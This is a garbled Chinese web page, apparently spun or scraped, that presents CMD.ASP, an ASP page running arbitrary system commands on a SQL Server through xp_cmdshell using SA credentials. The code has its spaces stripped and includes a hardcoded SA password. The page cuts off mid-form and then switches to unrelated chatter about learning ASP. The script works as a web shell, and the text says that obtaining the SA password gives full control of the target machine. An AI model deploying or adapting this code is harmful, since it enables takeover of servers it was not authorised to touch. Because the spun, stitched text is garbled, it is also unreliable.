ASP网站制作之SQLSERVER扩大存储历程XP_CMDSHELL的简...
缺乏可以共同遵循的行业标准,ASP还处在发展初期,大家对它的理解不同,如产品和服务标准,收费标准等,不利于行业的健康发展。server|sqlserver|存储历程XP_CMDSHELL存储历程是实行本机的CMD命令,请求体系上岸有SA权限,也就是说假如取得SQLSERVER的SA命令,那就能够在方针机随心所欲了,出名软件“流光”利用的应当也是这个存储历程来完成在方针机上的操纵。上面是我写的一个复杂的使用页面(ASP),代码以下。
CMD.ASP
<%@LANGUAGE="VBSCRIPT"CODEPAGE="936"%>
<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.01Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<metahttp-equiv="Content-Type"content="text/html;charset=gb2312">
<title>SQLSERVER_XP_CMDSHELL实例_把戏师・刘</title>
<styletype="text/css">
<!--
body{
font-size:13px;
line-height:20px;
width:760;
SCROLLBAR-FACE-COLOR:#2896e1;
SCROLLBAR-SHADOW-COLOR:#6cb4d8;
SCROLLBAR-ARROW-COLOR:#f0f0f0;
SCROLLBAR-DARKSHADOW-COLOR:#2896e1;
SCROLLBAR-BASE-COLOR:#2896e1;
background-image:url(images/bg.gif);
}
.LBR{
border-top:0pxsolid#336699;
border-left:1pxsolid#336699;
border-right:1pxsolid#336699;
border-bottom:1pxsolid#336699;
}
.all_h{
border:1pxsolid#336699;
}
.input{
border:1pxsolid#336699;
background-color:#ECEAFD;
}
.LB{
border-top:0pxsolid#336699;
border-left:1pxsolid#336699;
border-right:0pxsolid#336699;
border-bottom:1pxsolid#336699;
}
.N1{font-weight:bold;color:#339933;font-size:13px;}
.N2{font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head>
<body>
<%ifrequest("cmd")""then%>
<tablewidth=400border=0align=centercellpadding=5cellspacing=0>
<tralign=center>
<tdheight=30class=all_hbgcolor=#B3E0FF><spanclass=N1>XP_CMDSHELL哀求了局</span></td>
</tr>
<%
dimconnstr,conn,rs,i
ConnStr="Provider=sqloledb.1;persistsecurityinfo=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
ConnStr="Provider=sqloledb.1;persistsecurityinfo=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
setconn=Server.CreateObject("ADODB.Connection")
conn.openConnstr
setrs=server.CreateObject("ADODB.Recordset")
setrs=conn.execute("xp_cmdshell"&replace(replace(request("cmd"),"",""),chr(34),"")&"")
i=0
whilenotrs.eof
ifnotisnull(rs(0))then
ifimod2=0then
response.Write"<tr><tdclass=""LBR""bgcolor=""#DEF3FF"">"&rs(0)&"</td></tr>"
else
response.Write"<tr><tdclass=""LBR"">"&rs(0)&"</td></tr>"
endif
i=i+1
endif
rs.movenext
wend
rs.close
setrs=nothing
conn.close
setconn=nothing
%>
</table>
<%endif%>
<formname="form1"method="post"action="">
<tablewidth=400border=0align=centercellpadding=5cellspacing=0>
<tralign=center>
<tdheight=30colspan=2class=all_hbgcolor=#B3E0FF><spanclass=N1>XP_CMDSHELL实例</span></td>
</tr>
<tralign=centerbgcolor=#DEF3FF>
<tdwidth=26%class=LB><strong>服务器</strong></td>
<tdwidth=74%class=LBR><divalign="left">
<inputname="Server"type="text"id="Server"class="input"size="20"value="<%=request("Server")%>">
</div></td>
</tr>
<tralign=center>
<tdclass=LB><b>SA暗码</b></td>
<tdclass=LBR><divalign="left"><spanclass=N1>
<inputname="PWD"type="text"id="PWD"class="input"size="20"value="<%=request("PWD")%>">
</span></div></td>
</tr>
<tralign=centerbgcolor=#DEF3FF>
<tdwidth=26%class=LB><strong>CMD命令</strong></td>
<tdwidth=74%class=LBR><divalign="left">
<inputname="CMD"type="text"id="CMD"</p>我想详细了解ASP整站代码与PSP整站代码有什么优缺点,那个更好,更安全,更用容易维护,和管理。。。 他的语法和设计思路和VB完全相同,导致很多ASP的书都留一句“相关内容请参考VB的相关教材....”更糟糕的是,相当多的ASP教程混合了Javascript,VBscript等等脚本语言,搞的初学者。 ASP主要是用好六个对象,其实最主要的是用好其中两个:response和request,就可以随心所欲地控制网页变换和响应用户动作了。 在平时的学习过程中要注意现学现用,注重运用,在掌握了一定的基础知识后,我们可以尝试做一些网页,也许在开始的时候我们可能会遇到很多问题,比如说如何很好的构建基本框架。 ASP.Net摆脱了以前ASP使用脚本语言来编程的缺点,理论上可以使用任何编程语言包括C++,VB,JS等等,当然,最合适的编程语言还是MS为.NetFrmaework专门推出的C(读csharp),它可以看作是VC和Java的混合体吧。 以上是语言本身的弱点,在功能方面ASP同样存在问题,第一是功能太弱,一些底层操作只能通过组件来完成,在这点上是远远比不上PHP/JSP,其次就是缺乏完善的纠错/调试功能,这点上ASP/PHP/JSP差不多。 下面简单介绍一下我学习ASP的方法,希望对想学习ASP的朋友有所帮助... 运用经典的例子。并且自己可以用他来实现一些简单的系统。如果可以对他进行进一步的修改,找出你觉得可以提高性能的地方,加上自己的设计,那就更上一个层次了,也就会真正地感到有所收获。
页:
[1]